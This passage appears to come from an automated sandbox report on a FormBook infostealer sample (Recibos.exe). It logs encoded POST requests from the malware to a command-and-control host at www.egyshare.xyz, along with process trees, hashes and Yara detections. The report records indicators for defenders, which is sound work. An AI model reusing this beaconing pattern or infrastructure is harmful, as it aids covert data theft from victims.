                                                                41192.168.2.45004713.248.169.48804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:20:50.924683094 CET717OUTPOST /lp5b/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.egyshare.xyz
                                                                Origin: http://www.egyshare.xyz
                                                                Referer: http://www.egyshare.xyz/lp5b/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 7a 31 4a 35 39 57 66 4e 75 7a 33 39 50 46 4b 75 6c 68 2f 6c 55 7a 7a 30 63 4c 61 62 77 6e 35 52 56 4e 64 36 36 6e 32 61 65 43 76 4d 6a 45 66 64 2f 6d 2f 2b 72 66 78 35 61 43 57 36 45 36 41 46 55 4c 63 36 6a 37 4d 68 6f 68 47 6c 71 47 7a 4e 62 59 2f 37 34 78 70 6b 33 75 62 7a 74 45 72 45 77 6d 42 4d 47 50 65 34 73 78 4f 65 68 47 36 56 2f 43 6a 6b 78 69 6f 51 78 72 73 6a 47 50 51 77 50 72 67 45 31 47 63 6b 63 35 6b 36 61 30 47 64 69 68 7a 43 4d 59 6b 7a 35 2b 68 51 53 67 54 76 4b 4d 69 2b 4e 2b 62 45 2b 4f 78 6b 59 73 51 38 42 4d 38 31 41 2f 32 66 6d 65 56 48 41 44 50 62 65 67 3d 3d
                                                                Data Ascii: pFYX4n=z1J59WfNuz39PFKulh/lUzz0cLabwn5RVNd66n2aeCvMjEfd/m/+rfx5aCW6E6AFULc6j7MhohGlqGzNbY/74xpk3ubztErEwmBMGPe4sxOehG6V/CjkxioQxrsjGPQwPrgE1Gckc5k6a0GdihzCMYkz5+hQSgTvKMi+N+bE+OxkYsQ8BM81A/2fmeVHADPbeg==
                                                                Dec 10, 2024 12:20:52.073338985 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.45004813.248.169.48804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:20:53.592627048 CET737OUTPOST /lp5b/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 223
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.egyshare.xyz
                                                                Origin: http://www.egyshare.xyz
                                                                Referer: http://www.egyshare.xyz/lp5b/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 7a 31 4a 35 39 57 66 4e 75 7a 33 39 50 6d 53 75 6a 43 6e 6c 45 6a 7a 33 46 37 61 62 71 58 35 56 56 4e 42 36 36 6d 79 7a 65 30 48 4d 69 6c 76 64 2b 6e 2f 2b 75 66 78 35 51 69 57 2f 61 4b 41 4f 55 4c 67 59 6a 2b 30 68 6f 68 53 6c 71 48 44 4e 61 76 6a 34 35 68 70 6d 2f 4f 62 31 31 6b 72 45 77 6d 42 4d 47 50 61 65 73 31 69 65 68 54 71 56 2b 6d 33 6c 74 53 6f 54 6c 37 73 6a 4d 76 51 30 50 72 68 68 31 44 38 4f 63 37 63 36 61 32 4f 64 69 77 7a 46 43 59 6b 35 6e 4f 67 4f 66 55 66 2f 51 39 6e 52 4f 34 7a 6e 6a 63 6c 55 64 71 64 6d 51 39 64 69 53 2f 53 73 37 5a 63 7a 4e 41 79 53 46 67 6d 55 31 30 31 62 71 2b 76 43 78 41 4a 53 52 56 4e 53 69 73 63 3d
                                                                Data Ascii: pFYX4n=z1J59WfNuz39PmSujCnlEjz3F7abqX5VVNB66myze0HMilvd+n/+ufx5QiW/aKAOULgYj+0hohSlqHDNavj45hpm/Ob11krEwmBMGPaes1iehTqV+m3ltSoTl7sjMvQ0Prhh1D8Oc7c6a2OdiwzFCYk5nOgOfUf/Q9nRO4znjclUdqdmQ9diS/Ss7ZczNAySFgmU101bq+vCxAJSRVNSisc=


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:06:16:47
                                                                Start date:10/12/2024
                                                                Path:C:\Users\user\Desktop\Recibos.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Recibos.exe"
                                                                Imagebase:0x5d0000
                                                                File size:1'219'072 bytes
                                                                MD5 hash:654C0C7E931356FAA0396F064994DC50
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:06:16:52
                                                                Start date:10/12/2024
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Recibos.exe"
                                                                Imagebase:0xfb0000
                                                                File size:46'504 bytes
                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2046668076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2047021260.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2047577795.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:06:17:19
                                                                Start date:10/12/2024
                                                                Path:C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe"
                                                                Imagebase:0x750000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4106506329.0000000003160000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:6
                                                                Start time:06:17:22
                                                                Start date:10/12/2024
                                                                Path:C:\Windows\SysWOW64\wlanext.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\wlanext.exe"
                                                                Imagebase:0xc50000
                                                                File size:78'336 bytes
                                                                MD5 hash:0D5F0A7CA2A8A47E3A26FB1CB67E118C
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4106577645.0000000003110000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4105404041.0000000002C70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4106632902.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                General

                                                                Target ID:7
                                                                Start time:06:17:34
                                                                Start date:10/12/2024
                                                                Path:C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe"
                                                                Imagebase:0x750000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4108279577.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:8
                                                                Start time:06:17:48
                                                                Start date:10/12/2024
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff6bf500000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Disassembly

                                                                No disassembly